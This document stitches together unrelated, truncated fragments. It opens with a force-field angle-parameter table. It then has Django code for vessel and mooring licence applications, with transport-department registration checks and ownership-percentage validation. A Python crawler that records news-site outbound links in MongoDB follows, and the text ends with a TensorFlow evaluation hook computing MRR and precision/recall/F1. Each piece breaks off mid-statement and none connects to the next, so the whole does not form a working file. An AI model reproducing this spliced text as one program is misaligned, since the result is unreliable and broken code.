ha-c2-pf 56.4 121.40 SOURCE3_SOURCE5 15 1.6416
ha-c2-s2 46.6 118.74 SOURCE3 2
ha-c2-s4 43.2 115.30 SOURCE3 2
ha-c2-s 43.8 115.70 SOURCE3 2
ha-c2-s6 43.0 116.60 SOURCE3 2
ha-c2-sh 43.3 111.74 SOURCE3 1
ha-c2-ss 43.6 116.72 SOURCE3 7 2.7543
hc-c2-hc 37.4 118.92 SOURCE3 1
hc-c2-n2 65.0 120.40 SOURCE3 1
hc-c2-n 62.5 114.04 SOURCE3 1
hc-c2-na 61.0 119.10 SOURCE3 1
hc-c2-nh 63.1 113.36 SOURCE3 1
hc-c2-no 61.2 112.12 SOURCE3 1
hc-c2-oh 64.1 116.22 SOURCE3 1
hc-c2-os 63.3 116.11 SOURCE3 1
hc-c2-p3 52.6 117.19 SOURCE3 1
hc-c2-p5 51.2 119.58 SOURCE3 1
hc-c2-s4 43.1 116.12 SOURCE3 1
hc-c2-s6 43.2 115.45 SOURCE3 1
hc-c2-sh 42.6 | |
vessel_ownership_data.get(key)})
# overwrite vessel_data.id with correct value
if type(instance.child_obj) == MooringLicenceApplication and vessel_data.get('readonly'):
# do not write vessel_data to proposal
pass
else:
serializer = SaveDraftProposalVesselSerializer(instance, vessel_data)
serializer.is_valid(raise_exception=True)
print(serializer.validated_data)
serializer.save()
def dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data):
json_string = json.dumps(payload)
dot_response_str = get_dot_vessel_information(request, json_string)
dot_response_json = json.loads(dot_response_str)
logger.info("dot_response_json")
logger.info(dot_response_json)
logger.info(dot_response_json.get("status"))
if dot_response_json.get("status") and not dot_response_json.get("status") == 200:
raise serializers.ValidationError("DoT Service Unavailable")
dot_response = dot_response_json.get("data")
dot_boat_length = dot_response.get("boatLength")
boat_found = True if dot_response.get("boatFound") == "Y" else False
boat_owner_match = True if dot_response.get("boatOwnerMatch") else False
ml_boat_length = vessel_data.get("vessel_details", {}).get("vessel_length")
if not boat_found or not boat_owner_match or not dot_boat_length == float(ml_boat_length):
vessel_lookup_errors[vessel_data.get("rego_no")] = "The provided details do not match those recorded with the Department of Transport"
def submit_vessel_data(instance, request, vessel_data):
print("submit vessel data")
print(vessel_data)
# Dot vessel rego lookup
if settings.DO_DOT_CHECK:
vessel_lookup_errors = {}
# Mooring Licence vessel history
if type(instance.child_obj) == MooringLicenceApplication and instance.approval:
for vo in instance.approval.child_obj.vessel_ownership_list:
dot_name = vo.dot_name
owner_str = dot_name.replace(" ", "%20")
payload = {
"boatRegistrationNumber": vo.vessel.rego_no,
"owner": owner_str,
"userId": str(request.user.id)
}
dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data)
# current proposal vessel check
if vessel_data.get("rego_no"):
dot_name = vessel_data.get("vessel_ownership", {}).get("dot_name", "")
owner_str = dot_name.replace(" ", "%20")
payload = {
"boatRegistrationNumber": vessel_data.get("rego_no"),
"owner": owner_str,
"userId": str(request.user.id)
}
dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data)
if vessel_lookup_errors:
raise serializers.ValidationError(vessel_lookup_errors)
min_vessel_size_str = GlobalSettings.objects.get(key=GlobalSettings.KEY_MINIMUM_VESSEL_LENGTH).value
min_mooring_vessel_size_str = GlobalSettings.objects.get(key=GlobalSettings.KEY_MINUMUM_MOORING_VESSEL_LENGTH).value
min_vessel_size = float(min_vessel_size_str)
min_mooring_vessel_size = float(min_mooring_vessel_size_str)
if (not vessel_data.get('rego_no') and instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and
type(instance.child_obj) in [WaitingListApplication, MooringLicenceApplication, AnnualAdmissionApplication]):
return
## save vessel data into proposal first
save_vessel_data(instance, request, vessel_data)
vessel, vessel_details = store_vessel_data(request, vessel_data)
# associate vessel_details with proposal
instance.vessel_details = vessel_details
instance.save()
## vessel min length requirements - cannot use serializer validation due to @property vessel_applicable_length
if type(instance.child_obj) == AnnualAdmissionApplication:
if instance.vessel_details.vessel_applicable_length < min_vessel_size:
logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
elif type(instance.child_obj) == AuthorisedUserApplication:
if instance.vessel_details.vessel_applicable_length < min_vessel_size:
logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
# proposal
proposal_data = request.data.get('proposal') if request.data.get('proposal') else {}
mooring_id = proposal_data.get('mooring_id')
if mooring_id and proposal_data.get('site_licensee_email'):
mooring = Mooring.objects.get(id=mooring_id)
if (instance.vessel_details.vessel_applicable_length > mooring.vessel_size_limit or
instance.vessel_details.vessel_draft > mooring.vessel_draft_limit):
logger.error("Proposal {}: Vessel unsuitable for mooring".format(instance))
raise serializers.ValidationError("Vessel unsuitable for mooring")
elif type(instance.child_obj) == WaitingListApplication:
if instance.vessel_details.vessel_applicable_length < min_mooring_vessel_size:
logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_mooring_vessel_size_str))
raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_mooring_vessel_size_str))
else:
## Mooring Licence Application
if instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and instance.vessel_details.vessel_applicable_length < min_vessel_size:
logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
elif instance.vessel_details.vessel_applicable_length < min_mooring_vessel_size:
logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_mooring_vessel_size_str))
raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_mooring_vessel_size_str))
elif instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and (
instance.vessel_details.vessel_applicable_length > instance.approval.child_obj.mooring.vessel_size_limit or
instance.vessel_details.vessel_draft > instance.approval.child_obj.mooring.vessel_draft_limit
):
logger.error("Proposal {}: Vessel unsuitable for mooring".format(instance))
raise serializers.ValidationError("Vessel unsuitable for mooring")
# record ownership data
vessel_ownership = store_vessel_ownership(request, vessel, instance)
# associate vessel_ownership with proposal
instance.vessel_ownership = vessel_ownership
instance.save()
association_fail = False
proposals = [proposal.child_obj for proposal in Proposal.objects.filter(vessel_details__vessel=vessel).exclude(id=instance.id)]
proposals_wla = []
proposals_mla = []
proposals_aaa = []
proposals_aua = []
approvals = [ah.approval for ah in ApprovalHistory.objects.filter(end_date=None, vessel_ownership__vessel=vessel)]
approvals = list(dict.fromkeys(approvals)) # remove duplicates
approvals_wla = []
approvals_ml = []
approvals_ml_sus = []
approvals_aap = []
approvals_aup = []
approvals_aup_sus = []
for proposal in proposals:
if type(proposal) == WaitingListApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
proposals_wla.append(proposal)
if type(proposal) == MooringLicenceApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
proposals_mla.append(proposal)
if type(proposal) == AnnualAdmissionApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
proposals_aaa.append(proposal)
if type(proposal) == AuthorisedUserApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
proposals_aua.append(proposal)
for approval in approvals:
if type(approval) == WaitingListAllocation and approval.status == 'current':
approvals_wla.append(approval)
if type(approval) == MooringLicence and approval.status == 'current':
approvals_ml.append(approval)
if type(approval) == MooringLicence and approval.status in ['current', 'suspended']:
approvals_ml_sus.append(approval)
if type(approval) == AnnualAdmissionPermit and approval.status == 'current':
approvals_aap.append(approval)
if type(approval) == AuthorisedUserPermit and approval.status == 'current':
approvals_aup.append(approval)
if type(approval) == AuthorisedUserPermit and approval.status in ['current', 'suspended']:
approvals_aup_sus.append(approval)
# apply rules
if (type(instance.child_obj) == WaitingListApplication and (proposals_wla or approvals_wla or
proposals_mla or approvals_ml_sus)):
association_fail = True
# Person can have only one WLA, Waiting Liast application, Mooring Licence and Mooring Licence application
elif (type(instance.child_obj) == WaitingListApplication and (
WaitingListApplication.objects.filter(submitter=instance.submitter).exclude(processing_status__in=['approved', 'declined', 'discarded']).exclude(id=instance.id) or
WaitingListAllocation.objects.filter(submitter=instance.submitter).exclude(status__in=['cancelled', 'expired', 'surrendered']).exclude(approval=instance.approval) or
MooringLicenceApplication.objects.filter(submitter=instance.submitter).exclude(processing_status__in=['approved', 'declined', 'discarded']) or
MooringLicence.objects.filter(submitter=instance.submitter).filter(status__in=['current', 'suspended']))
):
raise serializers.ValidationError("Person can have only one WLA, Waiting List application, Mooring Licence and Mooring Licence application")
elif (type(instance.child_obj) == AnnualAdmissionApplication and (proposals_aaa or approvals_aap or
proposals_aua or approvals_aup_sus or proposals_mla or approvals_ml_sus)):
association_fail = True
elif type(instance.child_obj) == AuthorisedUserApplication and (proposals_aua or approvals_aup):
association_fail = True
elif type(instance.child_obj) == MooringLicenceApplication and (proposals_mla or approvals_ml):
association_fail = True
if association_fail:
raise serializers.ValidationError("This vessel is already part of another application/permit/licence")
## vessel ownership cannot be greater than 100%
ownership_percentage_validation(vessel_ownership)
def store_vessel_data(request, vessel_data):
if not vessel_data.get('rego_no'):
raise serializers.ValidationError({"Missing information": "You must supply a Vessel Registration Number"})
rego_no = vessel_data.get('rego_no').replace(" ", "").strip().lower() # successfully avoiding dupes?
vessel, created = Vessel.objects.get_or_create(rego_no=rego_no)
vessel_details_data = vessel_data.get("vessel_details")
# add vessel to vessel_details_data
vessel_details_data["vessel"] = vessel.id
## Vessel Details
existing_vessel_details = vessel.latest_vessel_details
## we no longer use a read_only flag, so must compare incoming data to existing
existing_vessel_details_data = VesselDetailsSerializer(existing_vessel_details).data
#print(existing_vessel_details_data.keys())
create_vessel_details = False
for key in existing_vessel_details_data.keys():
if key in vessel_details_data and existing_vessel_details_data[key] != vessel_details_data[key]:
create_vessel_details = True
print(existing_vessel_details_data[key])
print(vessel_details_data[key])
vessel_details = None
if create_vessel_details:
serializer = SaveVesselDetailsSerializer(data=vessel_details_data)
serializer.is_valid(raise_exception=True)
vessel_details = serializer.save()
else:
serializer = SaveVesselDetailsSerializer(existing_vessel_details, vessel_details_data)
serializer.is_valid(raise_exception=True)
vessel_details = serializer.save()
return vessel, vessel_details
def store_vessel_ownership(request, vessel, instance=None):
## Get Vessel
## we cannot use vessel_data, because this dict has been modified in store_vessel_data()
vessel_ownership_data = deepcopy(request.data.get('vessel').get("vessel_ownership"))
if vessel_ownership_data.get('individual_owner') is None:
raise serializers.ValidationError({"Missing information": "You must select a Vessel Owner"})
elif (not vessel_ownership_data.get('individual_owner') and not
vessel_ownership_data.get("company_ownership", {}).get("company", {}).get("name")
):
raise serializers.ValidationError({"Missing information": "You must supply the company name"})
company_ownership = None
company = None
if not vessel_ownership_data.get('individual_owner'):
## Company
company_name = vessel_ownership_data.get("company_ownership").get("company").get("name")
company, created = Company.objects.get_or_create(name=company_name)
## CompanyOwnership
company_ownership_data = vessel_ownership_data.get("company_ownership")
company_ownership_set = CompanyOwnership.objects.filter(
company=company,
vessel=vessel,
)
## Do we need to create a new CO record?
create_company_ownership = False
edit_company_ownership = True
if company_ownership_set.filter(status="draft"):
company_ownership = company_ownership_set.filter(status="draft")[0]
## cannot edit draft record with blocking_proposal
if company_ownership.blocking_proposal:
edit_company_ownership = False
elif company_ownership_set.filter(status="approved"):
company_ownership = company_ownership_set.filter(status="approved")[0]
existing_company_ownership_data = CompanyOwnershipSerializer(company_ownership).data
for key in existing_company_ownership_data.keys():
if key in company_ownership_data and existing_company_ownership_data[key] != company_ownership_data[key]:
create_company_ownership = True
print(existing_company_ownership_data[key])
print(company_ownership_data[key])
else:
create_company_ownership = True
# update company key from dict to pk
company_ownership_data.update({"company": company.id})
# add vessel to company_ownership_data
company_ownership_data.update({"vessel": vessel.id})
if create_company_ownership:
serializer = SaveCompanyOwnershipSerializer(data=company_ownership_data)
serializer.is_valid(raise_exception=True)
company_ownership = serializer.save()
elif edit_company_ownership:
serializer = SaveCompanyOwnershipSerializer(company_ownership, company_ownership_data)
serializer.is_valid(raise_exception=True)
company_ownership = serializer.save()
## add to vessel_ownership_data
if company_ownership and company_ownership.id:
vessel_ownership_data['company_ownership'] = company_ownership.id
if instance:
## set blocking_proposal
company_ownership.blocking_proposal = instance
company_ownership.save()
else:
vessel_ownership_data['company_ownership'] = None
vessel_ownership_data['vessel'] = vessel.id
owner, created = Owner.objects.get_or_create(emailuser=request.user)
vessel_ownership_data['owner'] = owner.id
vessel_ownership, created = VesselOwnership.objects.get_or_create(
owner=owner,
vessel=vessel,
company_ownership=company_ownership
)
serializer = SaveVesselOwnershipSerializer(vessel_ownership, vessel_ownership_data)
serializer.is_valid(raise_exception=True)
vessel_ownership = serializer.save()
# check and set blocking_owner
if instance:
vessel.check_blocking_ownership(vessel_ownership, instance)
# save temp doc if exists
if request.data.get('proposal', {}).get('temporary_document_collection_id'):
handle_document(instance, vessel_ownership, request.data)
# Vessel docs
if vessel_ownership.company_ownership and not vessel_ownership.vessel_registration_documents.all():
raise serializers.ValidationError({"Vessel Registration Papers": "Please attach"})
return vessel_ownership
def handle_document(instance, vessel_ownership, request_data, *args, **kwargs):
print("handle document")
temporary_document_collection_id = request_data.get('proposal', {}).get('temporary_document_collection_id')
if temporary_document_collection_id:
temp_doc_collection = None
if TemporaryDocumentCollection.objects.filter(id=temporary_document_collection_id):
temp_doc_collection = TemporaryDocumentCollection.objects.filter(id=temporary_document_collection_id)[0]
if temp_doc_collection:
for doc in temp_doc_collection.documents.all():
save_vessel_registration_document_obj(vessel_ownership, doc)
temp_doc_collection.delete()
instance.temporary_document_collection_id = None
instance.save()
def ownership_percentage_validation(vessel_ownership):
individual_ownership_id = None
company_ownership_id = None
min_percent_fail = False
vessel_ownership_percentage = 0
## First ensure applicable % >= 25
if hasattr(vessel_ownership.company_ownership, 'id'):
company_ownership_id = vessel_ownership.company_ownership.id
if not vessel_ownership.company_ownership.percentage:
raise serializers.ValidationError({
"Ownership Percentage": "You must specify a percentage"
})
else:
if vessel_ownership.company_ownership.percentage < 25:
min_percent_fail = True
else:
vessel_ownership_percentage = vessel_ownership.company_ownership.percentage
elif not vessel_ownership.percentage:
raise serializers.ValidationError({
"Ownership Percentage": "You must specify a percentage"
})
else:
individual_ownership_id = vessel_ownership.id
if vessel_ownership.percentage < 25:
min_percent_fail = True
else:
vessel_ownership_percentage = vessel_ownership.percentage
if min_percent_fail:
raise | |
#!/usr/bin/python3.5
from time import time
from datetime import datetime
import requests
import logging
import coloredlogs
from bs4 import BeautifulSoup
# import tldextract
from urllib.parse import urljoin # , urlparse
from tld import get_tld
from pytrie import StringTrie
from multiprocessing import Pool # processes
import configparser
conf = configparser.ConfigParser()
conf.optionxform = str # stop confparser from lowercaseing stuff..
conf.read('config.ini')
# print(conf['database']['filename'])
from pymongo import MongoClient
# create a user-agent string with contact info
headers = {}
for key in conf['user-agent-string']:
headers[key] = conf['user-agent-string'][key]
# List of exceptions from confic where lowercasing found urls is ok and right
lower_ok = [n.strip() for n in
conf['allow_lowercase']['lowercase_ok'].split(",")]
# set up logging
logger = logging.getLogger("GeoNewsNet")
format = "%(asctime)s [%(levelname)s] [%(filename)s:%(lineno)s] %(message)s"
# CRITICAL 50, ERROR 40, WARNING 30, INFO 20, DEBUG 10
# logging.basicConfig(level=logging.DEBUG, format=format)
coloredlogs.install(level=logging.DEBUG, fmt=format) # , format=format
# hush requests...!
logging.getLogger("requests").setLevel(logging.WARNING)
class LinksExtractor:
"""Take a url from known news outlet.
Look for links to other domains.
Save the links out from this run.
Save the freq dist for links out to each domain
found.
How deep should we go? one level? two?
"""
def __init__(self, url, n_levels_deep=1,
is_composite=False):
"""..."""
logger.info("init Class with '{}'".format(url))
self.site = url
self.full_domain = get_tld(url) # top level domain
self.links_out = []
self.internal_links = []
self.n_levels_deep = n_levels_deep
self.is_composite = is_composite
self.domains_we_study = StringTrie() # prefix tree
# set up mongodb
self.client = MongoClient(conf['database']['path'],
int(conf['database']['port']))
self.db = self.client[conf['database']['mongo_db']]
self.scraped = [] # init this with stuff from db
add_previously_scraped = self.db.internal_links.find({
"link_base_domain": self.full_domain
}, {"link": 1})
for doc in add_previously_scraped:
self.scraped.append(doc['link'])
# and a trie (prefex tree) https://pythonhosted.org/PyTrie/
# to hold the domains we care about
# http://stackoverflow.com/a/5435784/357387
scope = self.db.newsNetActors.find({}, {"url": 1})
for doc in scope:
self.domains_we_study[doc['url']] = doc['url']
def is_composite_actor(self, tld_url):
if self.db.newsNetActors.find({
"registered_domain": tld_url,
"is_comp_site": {
"$ne": "no"
}
}).count() == 0: # 0 means not composite
return False
else:
return True
def has_class_but_no_id(self, tag):
return tag.has_attr('class') and not tag.has_attr('id')
def save_url_to_db(self, url, l, l_tld):
# split intern & exstern
if self.full_domain == l_tld:
# internal - just append lo list
if l not in self.internal_links:
self.internal_links.append(l)
else:
# external links - save appropriately to db
if l not in self.links_out:
self.links_out.append(l)
# figure out if target is composite
if self.is_composite_actor(l_tld):
try:
l_tld = self.domains_we_study.longest_prefix(l)
except:
pass
# print("l:", l, "l_tdl", l_tld)
doc_external = {
"from_url": url,
"from_base_url": self.full_domain,
"to_url": l,
"to_base_url": l_tld,
"found_date": datetime.now()
}
condit = {"from_url": url, "to_url": l}
self.db.external.update(condit,
{"$setOnInsert": doc_external},
upsert=True)
def save_composite_url_to_db(self, url, l, l_tld):
'''If the url is from a composite newssite, we use a prefixtree
to decide if a url is internal or external
url = the url from where we found a link
l = the url to where we found a link
l_tld = base_url of found link (top level domain)
'''
# see if the target exists in the prefixtree
try:
p_base = self.domains_we_study.longest_prefix(l)
except:
p_base = None
# if we found a longest prefix AND this the site we
# examine right nows' url is in this base (actually equals.)
if p_base and self.site == p_base:
internal = True
else:
internal = False
if internal:
# store it for later iterations
if l not in self.internal_links:
self.internal_links.append(l)
else:
# external
if l not in self.links_out:
self.links_out.append(l)
# figure out if target is composite
# set l_tld to longest prefix if posible.
if self.is_composite_actor(l_tld):
try:
l_tld = self.domains_we_study.longest_prefix(l)
except:
pass
doc_external = {
"from_url": url,
"from_base_url": self.site,
"to_url": l,
"to_base_url": l_tld,
"found_date": datetime.now()
}
condit = {"from_url": url, "to_url": l}
self.db.external.update(condit,
{"$setOnInsert": doc_external},
upsert=True)
def filter_links(self, link):
'''http://stackoverflow.com/a/28905106/357387'''
href = link and link.get('href')
if href:
return all([
link,
link.name == 'a',
href,
not link.has_attr('no_track'),
not href.startswith(("mailto", "ftp", "tlf", "tel", "javasc",
"sms", "//", "avisa@", "redaksjonen@",
'#', "webcal")),
'{' not in href,
not href.endswith((".jpg", ".pdf", ".doc", ".xls", "jpeg",
".png", ".mov"))
])
else:
# logger.info("this link is no good: {}".format(link))
return False
def get_links(self, url):
# store url as scraped
self.scraped.append(url)
# check if it is in db
if not self.db.internal_links.find({'link': url}).count() > 0:
# if not, insert new scraped url
# get link_base_domain correct for composite sites...
temp_tld = get_tld(url)
# herpahps redundant, but do a check if this url is a composite
# site in the actors collections
if self.is_composite_actor(temp_tld):
try:
temp_tld = self.domains_we_study.longest_prefix(url)
except:
pass
# print("url, temp_tld, l:237", url, temp_tld)
# insert internal
doc_internal = {
"scraped": True,
"link": url,
"link_base_domain": temp_tld,
"found": datetime.now()
}
self.db.internal_links.insert_one(doc_internal)
# this try except should be rewritten,
# there are more exceptions than you might thing.
# only accept ok status, skipp all others.
try:
r = requests.get(url, headers=headers)
except (requests.exceptions.ConnectionError,
requests.exceptions.TooManyRedirects,
requests.exceptions.InvalidSchema,
requests.exceptions.ChunkedEncodingError,
requests.exceptions.ContentDecodingError,
requests.exceptions.ReadTimeout): # as e
logger.debug("""Url dos not exist? (or too many redirects)
or invalid schema, or ChunkedEncodingError++
on {}""".format(url),
exc_info=True)
return
if r.status_code == requests.codes.ok:
try:
soup = BeautifulSoup(r.text, 'lxml') # html.parser
except:
logger.debug("content not html? {}".format(url))
return
# logger.debug(soup)
# use the filters - get links from where we are now.
for link in soup.find_all(self.filter_links):
l = link.get('href')
# logger.debug(l)
# fix internal to full length urls
if not l.lower().startswith(("http://", "https://")):
l = urljoin(self.site, l)
# print("now its", l)
# fix backwards errors from ystadsallehanda.se
if l.lower().startswith("http://http://"):
l = l[7:]
try:
l_tld = get_tld(l)
except:
logger.info("at {} can't find tld for {}".format(url, l))
continue
if len(l_tld) == 0:
l = urljoin(self.site, l)
l_tld = get_tld(l)
logger.debug("joined relative url {}".format(l))
# NB: http://sn.dk/Naestved does not register any a-tags,
# even if the soup object does contain 'em. (ugly fix added)
if any(exc in l for exc in lower_ok):
l = l.lower()
l_tld = get_tld(l)
# logger.debug("exception! url .lower(): {}".format(l))
if l in self.scraped: # "already scraped"
continue
if self.is_composite:
self.save_composite_url_to_db(url, l, l_tld)
else:
# from_utl, to_url + tld
self.save_url_to_db(url, l, l_tld)
# logger.debug(l)
else:
logger.debug("Status '{}' not ok: {}".format(r.status_code, url))
def scrape(url_tuple):
exObj = LinksExtractor(url_tuple[0],
is_composite=url_tuple[1],
n_levels_deep=int(conf['search-depth']['depth']), # noqa
)
exObj.get_links(url_tuple[0])
# simpler version of http://stackoverflow.com/q/12484113/357387
# ensure we go n levels deep
for i in range(exObj.n_levels_deep):
potentials = list(set([n for n in exObj.internal_links
if n not in exObj.scraped]))
# dont bother if we have no new potentials
if len(potentials) > 0:
logger.debug("* Round: {} with {} candidate urls"
.format(i+1, len(potentials)))
# then loop though each of the new unknows
for new_url in potentials:
exObj.get_links(new_url)
logger.debug("{} N out-lenks found - {}"
.format(url_tuple[0], len(exObj.links_out)))
logger.debug("{} N scraped antall - {}"
.format(url_tuple[0], len(exObj.scraped)))
logger.debug("{} N intrnal - {}"
.format(url_tuple[0], len(exObj.internal_links)))
pot = len([n for n in exObj.internal_links if n not in exObj.scraped])
logger.debug("{} N new links we can (could have) follow(ed): {}"
.format(url_tuple[0], pot))
def collect_data():
to_scrape = []
client = MongoClient(conf['database']['path'],
int(conf['database']['port']))
db = client[conf['database']['mongo_db']]
cursor = db.newsNetActors.find() # .limit(5)
for document in cursor:
advanced = True if document['is_comp_site'].strip() != 'no' else False
to_scrape.append((document['url'], advanced))
# reverse order
to_scrape = to_scrape[::-1]
logger.debug("Got the sites to scrape {} stk, lets go..!"
.format(len(to_scrape)))
# try to parallelize
# http://chriskiehl.com/article/parallelism-in-one-line/
# from multiprocessing.dummy import Pool as ThreadPool # threads
pool = Pool(24) # ThreadPool(24)
pool.map(scrape, to_scrape)
pool.close()
pool.join()
logger.debug("function collect_data finnished peacefully")
def collect_data_fill_potential_holes(n=10):
"""148 sites had less than 100 internal, 100 had less than 10
and are probably technical errors that needs to be fixed, hence
this function. n=10 by default, but 100 seems more reasonable"""
# connect
client = MongoClient(conf['database']['path'],
int(conf['database']['port']))
db = client[conf['database']['mongo_db']]
cursor = db.newsNetActors.find()
# build the list of all sites
all_sites = []
for document in cursor:
advanced = True if document['is_comp_site'].strip() != 'no' else False
all_sites.append((document['url'], advanced,
document['registered_domain']))
# get the number of each site scraped urls (not inlcuding 0 scraped)
cur = db.internal_links.aggregate([
{"$group": {"_id": "$link_base_domain", "count": {"$sum": 1}}},
{"$sort": {"count": 1}}
])
all_in_db = {} # if we have 0 in db, we need to know and add later
for c in cur:
all_in_db[c["_id"]] = c['count']
rescrape_these = []
for u in all_sites:
test = u[2]
if (u[1] is True):
test = u[0]
# find how many we have on this or 0 if not found
if(all_in_db.get(test, 0) < n):
# tuple (url.com, True)
rescrape_these.append((u[0], u[1]))
logger.debug("rescrape {} items".format(len(rescrape_these)))
# then | |
shape (batch_size, num_candidates), in which each prediction is a
num_candidates-long binary vector (with 0 or more 1's and the rest 0).
(num_candidates may vary over batches; in that case the metrics macro- microP/R/F1 are not available,
but Acc and MRR are)
target:
binary targets; either for each instance as index of correct answer (if unique),
or as binary vectors (with 0 or more 1's for correct answers), similar to predict.
at_every_epoch:
evaluated each at_every_epoch epochs. Note that calling EvalHook requires loss-argument to be 0,
as automatically done post-epoch in jtr.sisyphos.train, hence always called after finishing the epoch.
placeholders:
placeholders, in case batches does not generate feed_dicts.
metrics: list with metrics;
default: [], which will return all available metrics (dep. on type of problem)
Options are currently:
'Acc', 'MRR', 'microP', 'microR', 'microF1', 'macroP', 'macroR', 'macroF1', 'precision', 'recall', 'F1'.
Note: mostly not all the metrics are available, but deciding on sensible metrics is left to the user;
E.g.: if the number of candidates remains constant, micro- and macro-metrics will be returned,
even if the 'labels' for the actual candidates vary over instances.
summary_writer:
optional summary_writer; if set, each (epoch,metric) will be written by the summary_writer, with
label `msg+"_"+metric` (e.g. "development_microF1")
print_details:
if True, prints for each instance:
target, prediction, logits, and whether the prediction is entirely correct
write_metrics_to (filepath):
Write metrics to the given file. If empty no metrics will be
written to disk.
print_to:
if a filename is specified, appends the details per instance (as for print_details) to that file.
msg:
print this message before the evaluation metrics; useful to distinguish between calls of en EvalHook on train/dev/test data.
"""
super(EvalHook, self).__init__(summary_writer)
self.batches = batches
self.logits = logits
self.predict = predict
self.target = target
self.at_every_epoch = at_every_epoch
self.placeholders = placeholders
#self.done_for_epoch = False
self.iter = 0
self.print_details = print_details
self.print_to = print_to
self.info = info
self.metrics = metrics
self.write_metrics_to = write_metrics_to# + '_' + info
def _calc_mrr(self, scores, targets):
#todo: verify!
assert scores.shape == targets.shape #targets must be array with binary vector per instance (row)
rrs = []
for score, target in zip(scores, targets):
order = score.argsort()[::-1] #sorted id's for highest to lost score
#refIDs = np.where(target==1)
refIDs = [i for i,t in enumerate(target) if t == 1]
for i in range(len(order)):
rank = i+1
if order[i] in refIDs: #rank of first relevant answer
break
rrs.append(1./rank)
return rrs
def _calc_micro_PRF(self, binary_predictions, binary_targets):
#todo: verify!
predict_complement = np.add(1.0, -binary_predictions)
target_complement = np.add(1.0, -binary_targets)
tp = np.sum(np.multiply(binary_predictions, binary_targets)) # p = 1, t = 1
fp = np.sum(np.multiply(binary_predictions, target_complement)) # p = 1, t = 0
fn = np.sum(np.multiply(predict_complement, binary_targets)) # p = 0, t = 1
microp = tp / (tp + fp) if tp > 0 else 0.0
micror = tp / (tp + fn) if tp > 0 else 0.0
microf1 = 2. * microp * micror / (microp + micror) if (microp * micror > 0) else 0.0
return microp, micror, microf1
def _calc_macro_PRF(self, binary_predictions, binary_targets):
"""
first dimension of input arguments: instances; 2nd dimension: different labels
(returns None when only 1 label dimension is given)
"""
#todo: verify!
predict_complement = np.add(1.0, -binary_predictions)
target_complement = np.add(1.0, -binary_targets)
tp = np.sum(np.multiply(binary_predictions, binary_targets), axis=0) # p = 1, t = 1
fp = np.sum(np.multiply(binary_predictions, target_complement), axis=0) # p = 1, t = 0
fn = np.sum(np.multiply(predict_complement, binary_targets), axis=0) # p = 0, t = 1
inds_tp0 = np.where(tp!=0)
r = np.zeros(np.shape(tp))
r[inds_tp0] = np.divide(tp[inds_tp0], tp[inds_tp0] + fn[inds_tp0])
p = np.zeros(np.shape(tp))
p[inds_tp0] = np.divide(tp[inds_tp0], tp[inds_tp0] + fp[inds_tp0])
inds_pr0 = np.where(np.multiply(p,r)!=0)
f1 = np.zeros(np.shape(tp))
f1[inds_pr0] = 2.*np.divide(np.multiply(p[inds_pr0], r[inds_pr0]), np.add(p[inds_pr0], r[inds_pr0]))
macrop = np.mean(p)
macror = np.mean(r)
macrof1 = np.mean(f1)
return macrop, macror, macrof1
def __call__(self, sess, epoch, model, loss, current_feed_dict=None):
"""
Call the EvalHook.
Args:
`sess`
`epoch`
`model`
`loss`
Additional inputs in **kwargs:
`post_epoch` boolean;
the hook is only executed when `post_epoch=True`
(and provided epoch % self.at_every_epoch == 0).
"""
self.iter += 1
#post_epoch = False if not 'post_epoch' in kwargs else kwargs['post_epoch']
#if epoch % self.at_every_epoch != 0 or not post_epoch:
# return
#if self.done_for_epoch == True:
# return
#print("Evaluation: ", self.info)
predictions, targets = None, None
predictions_bin, targets_bin = None, None
convert2binary = lambda indices, n: np.asarray([[1 if j == i else 0 for j in range(n)] for i in indices])
#initiate metrics
rrs = []
total = 0
correct = 0
n = 0
consistent = True
for i, batch in enumerate(self.batches):
if self.placeholders is not None:
feed_dict = dict(zip(self.placeholders, batch))
else:
feed_dict = batch
prediction = sess.run(self.predict, feed_dict=feed_dict)
target = feed_dict[self.target]
logits = sess.run(self.logits, feed_dict=feed_dict)
n = logits.shape[-1] #may be variable per batch; may be 1 for binary problem
#store evaluated forms (whether indices or binary vectors)
predictions = prediction if predictions is None else np.concatenate([predictions, prediction], axis=0)
targets = target if targets is None else np.concatenate([targets, target], axis=0)
#create binary vectors
target_bin = target if target.shape == logits.shape else convert2binary(target, n)
prediction_bin = prediction if prediction.shape == logits.shape else convert2binary(prediction, n)
overlap = [np.asarray([p==t]).all() for p,t in zip(prediction_bin, target_bin)]
correct += np.sum(overlap)
total += prediction_bin.shape[0]
if consistent:
try:
predictions_bin = prediction_bin if predictions_bin is None else np.concatenate([predictions_bin, prediction_bin], axis=0)
targets_bin = target_bin if targets_bin is None else np.concatenate([targets_bin, target_bin], axis=0)
#in case not compatible over different batches:
except:
consistent = False
if n > 1:
rrs.extend(self._calc_mrr(logits, target_bin))
#else: makes no sense to calculate MRR
report = ""
for i in range(prediction_bin.shape[0]):
is_correct = all(target_bin[i] == prediction_bin[i])
report += 'target:%s\tprediction:%s\tlogits:%s\tcorrect:%s\n'\
%(str(target[i]), str(prediction[i]), str(logits[i]), is_correct)
# alternative:
# probs = sess.run(tf.nn.softmax(self.logits), feed_dict=feed_dict)
if self.print_details:
logger.info(report)
if self.print_to != "":
with open(self.print_to, "a") as myfile:
